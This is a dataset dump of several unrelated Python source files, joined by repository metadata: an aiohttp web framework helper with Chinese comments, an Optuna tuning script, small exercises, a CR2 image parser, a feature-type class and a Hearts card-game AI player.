self","repo_name":"qcgm1978/py-test","sub_path":"test/machine_learning/graphic/decision_tree.py","file_name":"decision_tree.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"877841981","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n基于aiohttp的web框架,进一步简化Web开发\naiohttp相对比较底层,想要使用框架时编写更少的代码,就只能在aiohttp框架上封装一个更高级的框架\nWeb框架的设计是完全从使用者出发,目的是让框架使用者编写尽可能少的代码\n\"\"\"\n__author__ = 'Hk4Fun'\n\nimport asyncio\n# 用来修改文件模块路径\nimport os\n# 用来获取函数的参数信息\nimport inspect\nimport logging\n# 用来还原被装饰函数的属性,如__name__\nimport functools\n# 用来解析url的查询参��\nfrom urllib import parse\nfrom aiohttp import web\n# 引用自己的模块,检测api调用错误,这里可以先忽略它\nfrom apis import APIError\n\n\n# 这是个装饰器,在handlers模块中被引用,其作用是给http请求添加请求方法和请求路径这两个属性\n# 这是个三层嵌套的decorator(装饰器),目的是可以在decorator本身传入参数\n# 这个装饰器将一个函数映射为一个URL处理函数\ndef get(path):\n def decorator(func): # 传入参数是函数\n # python内置的functools.wraps装饰器作用是把装饰后的函数的__name__属性变为原始的属性,即func的属性\n # 因为当不使用该装饰器时函数的__name__为wrapper,而不是func\n @functools.wraps(func)\n def wrapper(*args, **kw):\n return func(*args, **kw)\n wrapper.__method__ = 'GET' # 给原始函数添加请求方法 “GET”\n wrapper.__route__ = path # 给原始函数添加请求路径 path\n return wrapper\n return decorator\n# 这样,一个函数通过@get(path)的装饰就附带了URL信息\n\n# 同get(path)\ndef post(path):\n def decorator(func):\n @functools.wraps(func)\n def wrapper(*args, **kw):\n return func(*args, **kw)\n wrapper.__method__ = 'POST'\n wrapper.__route__ = path\n return wrapper\n return decorator\n\n\n# 关于inspect.Parameter 的 kind 类型有5种:\n# POSITIONAL_ONLY\t\t只是位置参数\n# POSITIONAL_OR_KEYWORD\t可以是位置参数也可以是关键字参数\n# VAR_POSITIONAL\t\t相当于 *args\n# KEYWORD_ONLY\t\t\t相当于 *,key\n# VAR_KEYWORD\t\t\t相当于 **kw\n# 具体可参考:http://blog.csdn.net/weixin_35955795/article/details/53053762\n# 函数的参数fn本身就是个函数,下面五个函数是针对fn函数的参数做一些处理判断\n\n\n# 这个函数将得到fn函数中的没有默认值的KEYWORD_ONLY的元组\ndef get_required_kw_args(fn):\n args = [] # 定义一个空的list,用来储存符合条件的fn的参数名\n params = inspect.signature(fn).parameters # 返回一个关于函数参数的键值字典(映射mapping)\n for name, param in params.items():\n # 参数类型为KEYWORD_ONLY且没有指定默认值,inspect.Parameter.empty表示参数的默认值为空\n if param.kind == inspect.Parameter.KEYWORD_ONLY and param.default == inspect.Parameter.empty:\n args.append(name) # 只是将参数名添加进去\n return tuple(args)\n\n#和上一个函数基本一样,唯一的区别就是不需要满足没有默认值这个条件,也就是说这个函数把fn的所有的KEYWORD_ONLY参数名都提取出来\ndef get_named_kw_args(fn):\n args = []\n params = inspect.signature(fn).parameters\n for name, param in params.items():\n if param.kind == inspect.Parameter.KEYWORD_ONLY:\n args.append(name)\n return tuple(args)\n\n#判断fn有没有KEYWORD_ONLY\ndef has_named_kw_args(fn):\n params = inspect.signature(fn).parameters\n for name, param in params.items():\n if param.kind == inspect.Parameter.KEYWORD_ONLY:\n return True\n\n#判断fn有没有**kw(变长关键字参数)\ndef has_var_kw_arg(fn):\n params = inspect.signature(fn).parameters\n for name, param in params.items():\n if param.kind == inspect.Parameter.VAR_KEYWORD:\n return True\n\n\n# 判断是否存在一个参数叫做request,并且该参数要在其他普通的位置参数之后,\n# 即fn(POSITIONAL_ONLY, request, VAR_POSITIONAL, KEYWORD_ONLY, VAR_KEYWORD)\n# 当然,这里request可以为VAR_POSITIONAL, KEYWORD_ONLY, VAR_KEYWORD中的一种\ndef has_request_arg(fn):\n sig = inspect.signature(fn) # 这边之所以拆成两行,是因为后面raise语句要用到sig\n params = sig.parameters\n found = False # 默认没有找到\n for name, param in params.items():\n if name == 'request':\n found = True\n continue # 为什么不是break?因为还得接着往下检查其他参数,确保request为最后一个位置参数\n # 或者是VAR_POSITIONAL, KEYWORD_ONLY, VAR_KEYWORD中的一种\n if found and (param.kind != inspect.Parameter.VAR_POSITIONAL\n and param.kind != inspect.Parameter.KEYWORD_ONLY\n and param.kind != inspect.Parameter.VAR_KEYWORD):\n raise ValueError('request parameter must be the last named parameter in function: %s%s'\n % (fn.__name__, str(sig)))\n return found\n\n\n# RequestHandler目的就是从URL函数中分析其需要接收的参数\n# 进而从request中获取必要的参数构造成字典以**kw传给该URL函数并调用\n\nclass RequestHandler(object):\n # 初始化自身的属性,从fn中获取必要的参数信息\n def __init__(self, app, fn):\n self._app = app\n self._func = fn\n self._has_request_arg = has_request_arg(fn)\n self._has_var_kw_arg = has_var_kw_arg(fn)\n self._has_named_kw_args = has_named_kw_args(fn)\n self._named_kw_args = get_named_kw_args(fn)\n self._required_kw_args = get_required_kw_args(fn)\n\n # 定义了__call__方法后这个类的实例就相当于一个函数可以直接调用了\n # 为什么要这么做呢?因为后面app.router.add_route()中需要传入一个回调函数\n # 而这个回调函数我们本来可以直接把handlers里的函数传进来\n # 但为了方便开发(构造框架),我们对该函数进行了一系列的封装处理\n # 这样也使得框架使用者尽管往handlers里添加实现业务逻辑的函数(handler)就行了,不必修改其他的模块,实现了透明化\n\n # __call__方法的代码逻辑:\n # 1.定义kw对象,用于保存参数\n # 2.判断request对象是否存在符合条件的参数,如果存在则根据是POST还是GET方法将参数内容保存到kw\n # 3.如果kw为空(说明request没有传递参数),则将match_info列表里面的资源映射表(在装饰器参数里的url路径有表示)赋值给kw;\n # 如果不为空则把命名关键字参数的内容给kw\n # 4.完善_has_request_arg和_required_kw_args属性\n\n # app.router.add_route()调用回调函数时会往该函数传递request参数\n async def __call__(self, request):\n kw = None\n # 如果fn有(**kw)或者(KEYWORD_ONLY)\n # 这说明fn需要传参,这些参数的值来自于request提交的数据\n # 这里不考虑POSITIONAL_OR_KEYWORD和VAR_POSITIONAL,\n # 因为用不到VAR_POSITIONAL,而且要求handlers中的url函数参数除了match_info和request其他的参数必须为KEYWORD_ONLY\n if self._has_var_kw_arg or self._has_named_kw_args:\n # POST/GET方法下解析request提交的数据类型并提取\n # method为post的处理\n if request.method == 'POST':\n # POST提交请求的类型通过content_type获取,可参考:http://www.cnblogs.com/aaronjs/p/4165049.html\n if not request.content_type:# 判断是否存在Content-Type,不存在则无法根据数据类型获取解析提交的数据\n return web.HTTPBadRequest('Missing Content-Type!')\n ct = request.content_type.lower() #统一小写,方便检测\n if ct.startswith('application/json'): # 这里用的是startswith而不是直接比较,因为后面可能还会有charset=utf-8,但我们并不关心\n params = await request.json() # 如果是json数据格式就用json()来读取json信息\n if not isinstance(params, dict):# 序列化后应该为dict,否则说明提交的json数据格式本身是有错误的\n return web.HTTPBadRequest('JSON body must be object!')\n kw = params # 正确的话把request的参数信息给kw(已经序列化成一个字典了)\n elif ct.startswith('application/x-www-form-urlencoded') or ct.startswith('multipart/form-data'): # 传统的浏览器提交表单格式\n params = await request.post() # 浏览器表单信息用post方法来读取\n kw = dict(**params) # 将表单信息转换成字典给kw\n else:#提交的数据类型既不是json对象,又不是浏览器表单,那就只能返回不支持该消息主体类型,其实就是不支持xml\n return web.HTTPBadRequest('Unsupported Content-Type: %s' % request.content_type)\n # method为get的处理\n if request.method == 'GET': # get方法比较简单,直接在url后面加上查询参数来请求服务器上的资源\n # request.query_string表示url中的查询字符串\n # 比如我百度ReedSun,得到网址为https://www.baidu.com/s?ie=UTF-8&wd=ReedSun\n # 其中‘ie=UTF-8&wd=ReedSun’就是查询字符串\n qs = request.query_string\n if qs: # 如果存在查询字符串\n kw = dict()\n # parse.parse_qs(qs, keep_blank_values=False, strict_parsing=False)函数的作用是解析一个给定的字符串\n # keep_blank_values默认为False,指示是否忽略空白值,True不忽略,False忽略\n # strict_parsing如果是True,遇到错误是会抛出ValueError错误,如果是False会忽略错误\n # 这个函数将返回一个字典,其中key是等号之前的字符串,value是等号之后的字符串但会是列表\n # 比如上面的例子就会返回{'ie': ['UTF-8'], 'wd': ['ReedSun']}\n for k, v in parse.parse_qs(qs, True).items():\n kw[k] = v[0]\n # 经过以上处理参数仍为空说明没有从Request中获取到数据或者fn没有符合的参数类型\n # 则将match_info列表里面的资源映射表(在装饰器参数里的url路径有表示)赋值给kw\n if kw is None:\n # Resource may have variable path also. For instance, a resource\n # with the path '/a/{name}/c' would match all incoming requests\n # with paths such as '/a/b/c', '/a/1/c', and '/a/etc/c'.\n # A variable part is specified in the form {identifier}, where the\n # identifier can be used later in a request handler to access the\n # matched value for that part. This is done by looking up the\n # identifier in the Request.match_info mapping:\n kw = dict(**request.match_info)\n # kw不为空时,则进一步处理kw\n else:\n # 当fn没有**kw且有KEYWORD_ONLY时,kw中只留下KEYWORD_ONLY的参数,其他的都删除,否则传参过多\n if (not self._has_var_kw_arg) and self._has_named_kw_args:\n copy = dict()\n for name in self._named_kw_args:# 遍历fn中每一个KEYWORD_ONLY参数\n if name in kw:#如果该参数在kw中也有则复制到copy中\n copy[name] = kw[name]\n kw = copy#将筛选出来的KEYWORD_ONLY参数覆盖掉原来的kw,这样kw中只留下KEYWORD_ONLY参数\n # 再将match_info中的数据放入kw,同时检查是否与kw中的数据命名重复,这里优先选择match_info\n for k, v in request.match_info.items():\n if k in kw:\n logging.warning('Duplicate arg name in kw args (choose match_info\\'s): %s' % k)\n kw[k] = v\n # 别漏了request,如果有request这个参数,则把request加入\n # 注意,这里说明fn不需要request时我们是可以不传的\n # 而如果没有这个框架则url函数必须要有request参数\n # 因为app.router.add_route()会强行传递request给它,再次看出框架的屏蔽性与透明化\n if self._has_request_arg:\n kw['request'] = request\n # 没有默认值的KEYWORD_ONLY参数必须要有值传给它,否则会报错\n if self._required_kw_args:\n for name in self._required_kw_args:\n if name not in kw:\n return web.HTTPBadRequest('Missing argument: %s' % name)\n logging.info('call with args: %s' % str(kw)) # 打印出最终传递给fn的参数\n try:\n return (await self._func(**kw))\n except APIError as e: # 捕捉遇到的api错误并返回给用户\n return dict(error=e.error, data=e.data, message=e.message)\n\n\n# 向app中添加静态文件路径\ndef add_static(app):\n # os.path.abspath(__file__), 返回当前脚本的绝对路径(包括文件名)\n # os.path.dirname(), 去掉文件名,返回目录路径\n # os.path.join(), 将分离的各部分组合成一个路径名\n # 因此以下操作就是将本文件同目录下的static目录加入到app的路由管理器中\n path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'static')\n app.router.add_static('/static/',path)\n logging.info('add static %s => %s' % ('/static/', path))\n\n# 注册URL处理函数\ndef add_route(app, fn):\n # 获取'__method__'和'__route__'属性,如果为空则抛出异常\n method = getattr(fn, '__method__', None)\n path = getattr(fn, '__route__', None)\n if path is None or method is None:\n raise ValueError('@get or @post not defined in %s.' % str(fn))\n # 判断fn是不是协程(即@asyncio.coroutine修饰的)并且判断是不是一个生成器(generator function)\n if not asyncio.iscoroutine(fn) and not inspect.isgeneratorfunction(fn):\n fn = asyncio.coroutine(fn)# 都不是的话,转换为协程\n logging.info('add route : method = %s, path = %s, fn = %s (%s)' % (\n method, path, fn.__name__, ', '.join(inspect.signature(fn).parameters.keys())))\n # 注册为相应的url处理方法(回调函数),回调函数为RequestHandler的自省函数 '__call__'\n app.router.add_route(method, path, RequestHandler(app, fn))\n\n\ndef add_routes(app, module_name):\n # 自动搜索传入的module_name的module的url处理函数\n # 检查传入的module_name是否有'.'\n # Python rfind() 返回字符串最后一个'.'出现的索引位置(从右边开始寻找),如果没有匹配项则返回-1\n n = module_name.rfind('.')\n # 没有'.',说明模块在当前目录下,直接导入\n if n == (-1):\n # __import__的作用类似import,import是为当前模块导入另一个模块,而__import__则是返回一个对象\n # __import__(name, globals=None, locals=None, fromlist=(), level=0)\n # name -- 模块名\n # globals, locals -- determine how to interpret the name in package context\n # fromlist -- name表示的模块的子模块或对象名列表\n # level -- 绝对导入还是相对导入,默认值为0, 即使用绝对导入,正数值表示相对导入时,导入目录的父目录的层数\n mod = __import__(module_name, globals(), locals())\n logging.info('globals = %s', globals()['__name__'])\n else:\n name = module_name[n+1:] # 取得子模块名\n # 以下语句表示, 先用__import__表达式导入模块以及子模块\n # 再通过getattr()方法取得子模块, 如handlers.handler\n mod = getattr(__import__(module_name[:n], globals(), locals(), [name]), name)\n for attr in dir(mod):# 遍历mod的方法和属性\n if attr.startswith('_'):# 如果是以'_'开头的,一律pass,我们定义的处理方法不是以'_'开头的\n continue\n fn = getattr(mod, attr)# 获取到非'_'开头的属性或方法\n if callable(fn):# 能调用的说明是方法\n # 检测'__method__'和'__route__'属性\n method = getattr(fn, '__method__', None)\n path = getattr(fn, '__route__', None)\n if method and path:# 如果都有,说明是我们定义的url处理方法,注册到app的route中\n add_route(app, fn)\n","repo_name":"Hk4Fun/awesome-python3-webapp","sub_path":"www/webframe.py","file_name":"webframe.py","file_ext":"py","file_size_in_byte":16633,"program_lang":"python","lang":"zh","doc_type":"code","stars":7,"dataset":"github-code","pt":"38"} +{"seq_id":"17793907048","text":"from functools import partial\n\nimport typer\nimport optuna\n\n\ndef set_trial(trial: optuna.Trial):\n trial.suggest_categorical(\"rnn_type\", ['gru', 'lstm'])\n trial.suggest_float(\"emb_dropout\", 0.0, 0.9)\n trial.suggest_int(\"embedding_dim\", 8, 1024, log=True)\n trial.suggest_categorical(\"bidirectional\", ['true', 'false'])\n trial.suggest_float(\"lstm_dropout\", 0.0, 0.9)\n trial.suggest_int(\"lstm_dim\", 8, 1024, log=True)\n trial.suggest_int(\"num_examples_per_class\", 8, 512, log=True)\n # trial.suggest_int(\"num_examples_per_class\", 8, 32, log=True)\n trial.suggest_categorical(\"num_layers\", [1, 2, 3, 4, 5])\n trial.suggest_categorical(\"num_highway_layers\", [1, 2, 3, 4, 5])\n trial.suggest_categorical(\"hidden_dims_id\", [str(x) for x in list(range(1, 11))])\n trial.suggest_float(\"features_dropout\", 0.0, 0.9)\n trial.suggest_float(\"lr\", 0.00001, 0.1, log=True)\n trial.suggest_categorical(\n \"features_act\",\n [\n 'linear',\n 'mish',\n 'swish',\n 'relu',\n 'relu6',\n 'elu',\n 'gelu',\n 'prelu',\n 'leaky_relu',\n 'hardtanh',\n 'sigmoid',\n 'tanh',\n 'log_sigmoid',\n 'softplus',\n 'softshrink',\n 'softsign',\n 'tanhshrink',\n 'selu'\n ]\n )\n\n\ndef fraud_objective(\n trial: optuna.Trial,\n config_path: str,\n serialization_dir: str\n) -> float:\n set_trial(trial)\n\n executor = optuna.integration.allennlp.AllenNLPExecutor(\n trial=trial,\n config_file=config_path,\n serialization_dir=f\"{serialization_dir}/{trial.number}\",\n metrics=\"best_validation_roc_auc\",\n include_package=\"fraud\",\n )\n return executor.run()\n\n\ndef main(\n config_path: str,\n serialization_dir: str,\n num_trials: int = 500,\n n_jobs: int = 1,\n timeout: int = 60 * 60 * 48,\n study_name: str = \"optuna_fraud\"\n):\n study = optuna.create_study(\n storage=\"sqlite:///result/final_classifier.db\",\n sampler=optuna.samplers.TPESampler(seed=245),\n study_name=study_name,\n pruner=optuna.pruners.HyperbandPruner(),\n direction=\"maximize\",\n load_if_exists=True,\n )\n\n objective = partial(fraud_objective, config_path=config_path, serialization_dir=serialization_dir)\n study.optimize(\n objective,\n n_jobs=n_jobs,\n n_trials=num_trials,\n timeout=timeout,\n )\n\n\nif __name__ == \"__main__\":\n typer.run(main)\n","repo_name":"fursovia/fraud_detection","sub_path":"fraud/run_optuna.py","file_name":"run_optuna.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"16076177958","text":"# Do not modify these lines\n__winc_id__ = '7b9401ad7f544be2a23321292dd61cb6'\n__human_name__ = 'arguments'\n\n# Add your code after this line\n\n#part 1 Greet template\ndef greet (name = 'dibbes', template = \"Hello, !\"):\n return template.replace('', name)\n\n\n#part 2 Force\ndef force (mass = 0.0, body = 'earth'): #surface gravity of planets & the sun\n planet = {\n 'sun': 274,\n 'jupiter': 24.9,\n 'neptune': 11.2,\n 'saturn': 10.4,\n 'earth': 9.8,\n 'uranus': 8.9,\n 'venus': 8.9,\n 'mars': 3.7,\n 'mercury': 3.7,\n 'moon': 1.6,\n 'pluto': 0.6 \n }\n return round(mass*planet[body],1)\n\n\n#part 3 \ndef pull (m1, m2, d):\n G = 6.674 * (10 ** -11) #this is the gravitational constant\n return G * ((m1 * m2) / (d ** 2)) #this is the gravitational pull \n \n \nprint (greet(\"Marcel\", \"What's up, !\"))\nprint (greet(\"Marcel\"))\nprint (greet())\n\nprint (pull(0.1, 5.972 * 10 ** 24, 6371)) #https://www.mathsisfun.com/physics/gravity.html","repo_name":"Verheij22/AssignmentArguments","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"11207477010","text":"class Solution:\n def largestValsFromLabels(self, values: List[int], labels: List[int], numWanted: int, useLimit: int) -> int:\n setsize,scorenum,d = 0,0,{}\n for v, l in sorted([[values[i], labels[i]] for i in range(len(values))], reverse = True):\n d[l] = d.get(l, 0) + 1\n if d[l] <= useLimit:\n scorenum,setsize= scorenum+v,setsize+1\n if setsize == numWanted:\n return scorenum\n return scorenum","repo_name":"ls1248659692/leetcode","sub_path":"spider/problems/1090-largest-values-from-labels/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":595,"dataset":"github-code","pt":"38"} +{"seq_id":"18608490086","text":"\"\"\"\nCanon CR2 raw image data, version 2.0 image parser.\n\nAuthors: Fernando Crespo\nCreation date: 21 february 2017\n\"\"\"\n\nfrom hachoir.parser import Parser\nfrom hachoir.field import SeekableFieldSet, RootSeekableFieldSet, Bytes, String, UInt8, UInt16, UInt32\nfrom hachoir.core.endian import LITTLE_ENDIAN, BIG_ENDIAN\nfrom hachoir.core.text_handler import textHandler, hexadecimal\nfrom hachoir.parser.image.exif import IFD, IFD_TAGS\n\n\ndef getStrips(ifd):\n data = {}\n for i, entry in enumerate(ifd.array('entry')):\n data[entry['tag'].display] = entry\n # image data\n if \"StripOffsets\" in data and \"StripByteCounts\" in data:\n offs = ifd.getEntryValues(data[\"StripOffsets\"])\n bytes = ifd.getEntryValues(data[\"StripByteCounts\"])\n for off, byte in zip(offs, bytes):\n yield off.value, byte.value\n\n\nclass ImageFile(SeekableFieldSet):\n\n def __init__(self, parent, name, description, ifd):\n SeekableFieldSet.__init__(self, parent, name, description, None)\n self._ifd = ifd\n\n def createFields(self):\n for off, byte in getStrips(self._ifd):\n self.seekByte(off, relative=False)\n yield Bytes(self, \"strip[]\", byte)\n\n\nclass CR2File(RootSeekableFieldSet, Parser):\n PARSER_TAGS = {\n \"id\": \"cr2\",\n \"category\": \"image\",\n \"file_ext\": (\"cr2\",),\n \"mime\": (\"image/x-canon-cr2\",),\n \"min_size\": 15,\n \"magic\": ((b\"CR\", 8),),\n \"description\": \"Canon CR2 raw image data, version 2.0\"\n }\n\n # Correct endian is set in constructor\n endian = LITTLE_ENDIAN\n\n def __init__(self, stream, **args):\n RootSeekableFieldSet.__init__(\n self, None, \"root\", stream, None, stream.askSize(self))\n if self.stream.readBytes(0, 2) == b\"MM\":\n self.endian = BIG_ENDIAN\n Parser.__init__(self, stream, **args)\n\n def validate(self):\n endian = self.stream.readBytes(0, 2)\n if endian not in (b\"MM\", b\"II\"):\n return \"Invalid endian (%r)\" % endian\n if self[\"version\"].value != 42:\n return \"Unknown Canon TIFF version - \" + str(self[\"version\"].value)\n if self[\"cr_identifier\"].value != \"CR\":\n return \"Unknown Canon Raw File\"\n return True\n\n def createFields(self):\n iff_start = self.absolute_address\n yield String(self, \"endian\", 2, \"Endian ('II' or 'MM')\", charset=\"ASCII\")\n if self[\"endian\"].value == \"II\":\n self.endian = LITTLE_ENDIAN\n else:\n self.endian = BIG_ENDIAN\n\n yield UInt16(self, \"version\", \"TIFF version number\")\n yield UInt32(self, \"img_dir_ofs\", \"Next image directory offset\")\n\n yield String(self, \"cr_identifier\", 2, \"Canon Raw marker\", charset=\"ASCII\")\n yield UInt8(self, \"cr_major_version\", \"Canon Raw major version number\")\n yield UInt8(self, \"cr_minor_version\", \"Canon Raw minor version number\")\n\n yield textHandler(UInt32(self, \"cr_raw_ifd_offset\", \"Offset to Raw IFD\"), hexadecimal)\n\n offsets = [(self['img_dir_ofs'].value, 'ifd[]', IFD)]\n\n while offsets:\n offset, name, klass = offsets.pop(0)\n self.seekByte(offset + iff_start // 8, relative=False)\n ifd = klass(self, name, iff_start)\n\n yield ifd\n for entry in ifd.array('entry'):\n tag = entry['tag'].value\n if tag in IFD_TAGS:\n name, klass = IFD_TAGS[tag]\n offsets.append((ifd.getEntryValues(entry)[\n 0].value, name + '[]', klass))\n if ifd['next'].value != 0:\n offsets.append((ifd['next'].value, 'ifd[]', IFD))\n\n for ifd in self.array('ifd'):\n offs = (off for off, byte in getStrips(ifd))\n self.seekByte(min(offs), relative=False)\n image = ImageFile(self, \"image[]\", \"Image File\", ifd)\n yield image\n","repo_name":"SickGear/SickGear","sub_path":"lib/hachoir/parser/image/cr2.py","file_name":"cr2.py","file_ext":"py","file_size_in_byte":3930,"program_lang":"python","lang":"en","doc_type":"code","stars":629,"dataset":"github-code","pt":"38"} +{"seq_id":"40885692964","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nfrom ads.feature_engineering.feature_type.base import FeatureType\nfrom ads.feature_engineering.utils import (\n _add_missing,\n _set_seaborn_theme,\n SchemeTeal,\n _format_stat,\n)\nfrom ads.feature_engineering import schema\nfrom ads.common.decorator.runtime_dependency import (\n runtime_dependency,\n OptionalDependency,\n)\n\n\nclass Integer(FeatureType):\n \"\"\"\n Type representing integer values.\n\n Attributes\n ----------\n description: str\n The feature type description.\n name: str\n The feature type name.\n warning: FeatureWarning\n Provides functionality to register warnings and invoke them.\n validator\n Provides functionality to register validators and invoke them.\n\n Methods\n --------\n feature_stat(x: pd.Series) -> pd.DataFrame\n Generates feature statistics.\n feature_plot(x: pd.Series) -> plt.Axes\n Shows distributions of datasets using box plot.\n \"\"\"\n\n description = \"Type representing integer values.\"\n\n @staticmethod\n def feature_stat(x: pd.Series) -> pd.DataFrame:\n \"\"\"Generates feature statistics.\n\n Feature statistics include (total)count, mean, standard deviation, sample minimum,\n lower quartile, median, 75%, upper quartile, max and missing(count) if there is any.\n\n Examples\n --------\n >>> x = pd.Series([1, 0, 1, 2, 3, 4, np.nan], name='integer')\n >>> x.ads.feature_type = ['integer']\n >>> x.ads.feature_stat()\n Metric Value\n 0\tcount\t 7\n 1\tmean\t 1\n 2\tstandard deviation\t 1\n 3\tsample minimum\t 0\n 4\tlower quartile\t 1\n 5\tmedian\t 1\n 6\tupper quartile\t 2\n 7\tsample maximum\t 4\n 8\tmissing\t 1\n\n Returns\n -------\n :class:`pandas.DataFrame`\n Summary statistics of the Series or Dataframe provided.\n \"\"\"\n df_stat = x.describe()\n _format_stat(df_stat)\n df_stat[\"count\"] = len(x)\n df_stat = _add_missing(x, df_stat).to_frame()\n df_stat.iloc[:, 0] = df_stat.iloc[:, 0]\n return df_stat\n\n @staticmethod\n @runtime_dependency(module=\"seaborn\", install_from=OptionalDependency.VIZ)\n def feature_plot(x: pd.Series) -> plt.Axes:\n \"\"\"\n Shows distributions of datasets using box plot.\n\n Examples\n --------\n >>> x = pd.Series([1, 0, 1, 2, 3, 4, np.nan], name='integer')\n >>> x.ads.feature_type = ['integer']\n >>> x.ads.feature_plot()\n\n Returns\n -------\n matplotlib.axes._subplots.AxesSubplot\n Plot object for the series based on the Integer feature type.\n \"\"\"\n col_name = x.name if x.name else \"integer\"\n df = x.to_frame(name=col_name)\n df = df[pd.to_numeric(df[col_name], errors=\"coerce\").notnull()]\n if len(df.index):\n _set_seaborn_theme()\n return seaborn.boxplot(\n x=df[col_name], width=0.2, color=SchemeTeal.AREA_DARK\n )\n\n @classmethod\n def feature_domain(cls, x: pd.Series) -> schema.Domain:\n \"\"\"\n Generate the domain of the data of this feature type.\n\n Examples\n --------\n >>> s = pd.Series([True, False, True, False, np.NaN, None], name='integer')\n >>> s.ads.feature_type = ['integer']\n >>> s.ads.feature_domain()\n constraints: []\n stats:\n count: 6\n freq: 2\n missing: 2\n top: true\n unique: 2\n values: Integer\n\n\n Returns\n -------\n ads.feature_engineering.schema.Domain\n Domain based on the Integer feature type.\n \"\"\"\n\n return schema.Domain(cls.__name__, cls.feature_stat(x).to_dict()[x.name], [])\n","repo_name":"oracle/accelerated-data-science","sub_path":"ads/feature_engineering/feature_type/integer.py","file_name":"integer.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"38"} +{"seq_id":"8605937664","text":"from __future__ import annotations\nfrom cards import Card, Rank, Suit\n\nclass BasicAIPlayer:\n\n\tdef __init__(self, name: str):\n\t\tself.name = name\n\t\tself.hand = []\n\t\tself.round_score = 0 \n\t\tself.total_score = 0\n\n\tdef __str__(self) -> str:\n\t\treturn self.name\n\n\tdef __repr__(self) -> str:\n\t\treturn self.__str__()\n\n\tdef play_card(self, trick: list[Card], broken_hearts: bool) -> Card:\n\t\t# lowest_card = Card(Rank.Ace, Suit.Hearts)\n\n\t\tself.hand.sort()\n\t\tfor i in self.hand:\n\t\t\tif self.check_valid_play(i, trick, broken_hearts)[0] == True:\n\t\t\t\tself.hand.remove(i)\n\t\t\t\treturn i\n\n\t\t# lowest_card = Card(Rank.Ace, Suit.Hearts)\n\n\t\t# for i in self.hand:\n\t\t# \tif self.check_valid_play(i, trick, broken_hearts)[0] == True:\n\t\t# \t\tif i < lowest_card: \n\t\t# \t\t\tlowest_card = i \n\n\t\t# self.hand.remove(lowest_card)\n\t\t# return lowest_card\n\n\tdef pass_cards(self) -> list[Card]:\n\t\thighest_cards = []\n\n\t\tfor i in range (3):\n\t\t\tcurrent_max = max(self.hand)\n\t\t\thighest_cards.append(current_max)\n\t\t\tself.hand.remove(current_max)\n\t\t\n\t\treturn highest_cards\n\t\t\t\n\tdef check_valid_play(self, card: Card, trick: list[Card], broken_hearts: bool) -> tuple(bool, str):\n\n\t\thas_required_suit = False\n\n\t\tleading = False \n\t\t\n\t\tif len(trick) == 0:\n\t\t\tleading = True\n\t\t\n\n\t\tif leading is True: \t\t\t\t\t\t\t\t\t\t\t\n\t\t\tfor i in self.hand:\n\t\t\t\tif i.suit == Suit.Clubs or i.suit == Suit.Diamonds or i.suit == Suit.Spades:\n\t\t\t\t\thas_required_suit = True\n\n\t\t\tif has_required_suit is True:\n\t\t\t\tif Card(Rank.Two, Suit.Clubs) in self.hand and card != Card(Rank.Two, Suit.Clubs):\n\t\t\t\t\toutput_tuple = (False, \"Player must play Two of Clubs\")\n\t\t\t\telif card.suit.name == \"Hearts\" and broken_hearts == False:\n\t\t\t\t\toutput_tuple = (False, \"Player cannot lead with hearts when Hearts are not broken\")\n\t\t\t\telse: \n\t\t\t\t\toutput_tuple = (True, \"valid play\")\n\t\t\t\n\t\t\telif has_required_suit is False:\n\t\t\t\toutput_tuple = (True, \"valid play\")\n\n\t\telse:\t\n\t\t\tfor i in self.hand:\n\t\t\t\tif trick[0].suit == i.suit:\n\t\t\t\t\thas_required_suit = True\n\n\t\t\tif has_required_suit is True:\n\t\t\t\tif card.suit != trick[0].suit:\n\t\t\t\t\toutput_tuple = (False, \"Player must Follow Suit\")\n\t\t\t\telse: \n\t\t\t\t\toutput_tuple = (True, \"valid play\")\n\n\t\t\telif has_required_suit is False:\n\t\t\t\tif card == Card(Rank.Queen, Suit.Spades) and trick[0] == Card(Rank.Two, Suit.Clubs):\n\t\t\t\t\toutput_tuple = (False, \"Player cannot play Queen of Spades during the first round\")\n\t\t\t\telse:\n\t\t\t\t\toutput_tuple = (True, \"valid play\")\t\t\n\n\t\t# print(\"leading: \" + str(leading))\n\t\t# print(\"has required suit: \" + str(has_required_suit))\n\t\t# print(output_tuple)\n\t\treturn output_tuple\n\nif __name__ == \"__main__\":\n\t# Test your function here\n\t# TASK 2.2 TEST \n\t# player = BasicAIPlayer(\"Test Player 1\")\n\t# player.hand = [Card(Rank.Two, Suit.Hearts), Card(Rank.Ace, Suit.Spades), Card(Rank.King, Suit.Hearts), Card(Rank.Ten, Suit.Hearts)]\n\t# trick, broken_hearts = [], False\n\t# print(player.hand[0])\n\t# print(player.check_valid_play(player.hand[0], trick, broken_hearts))\n\n\t# TASK 2.3 TEST \n\tplayer = BasicAIPlayer(\"Test Player 1\")\n\t# player.hand.append(Card(Rank.Two, Suit.Clubs))\n\t# player.hand.append(Card(Rank.Ace, Suit.Hearts))\n\t# player.hand.append(Card(Rank.King, Suit.Spades))\n\t# player.hand.append(Card(Rank.Ten, Suit.Spades))\n\tplayer.hand = [Card(Rank.Queen, Suit.Clubs),Card(Rank.Three, Suit.Hearts), Card(Rank.Eight, Suit.Hearts), Card(Rank.Nine, Suit.Clubs), Card(Rank.Jack, Suit.Spades), Card(Rank.Two, Suit.Diamonds), Card(Rank.Two, Suit.Spades)]\n\ttrick = [Card(Rank.Three, Suit.Diamonds)]\n\tprint(player.play_card(trick, broken_hearts=False))\n\n\t# TASK 2.3.1 TEST\n\t# player = BasicAIPlayer(\"Test Player 1\")\n\t# player.hand = [Card(Rank.Four, Suit.Clubs), Card(Rank.Ace, Suit.Hearts), Card(Rank.King, Suit.Spades), Card(Rank.Ten, Suit.Spades),]\n\t# 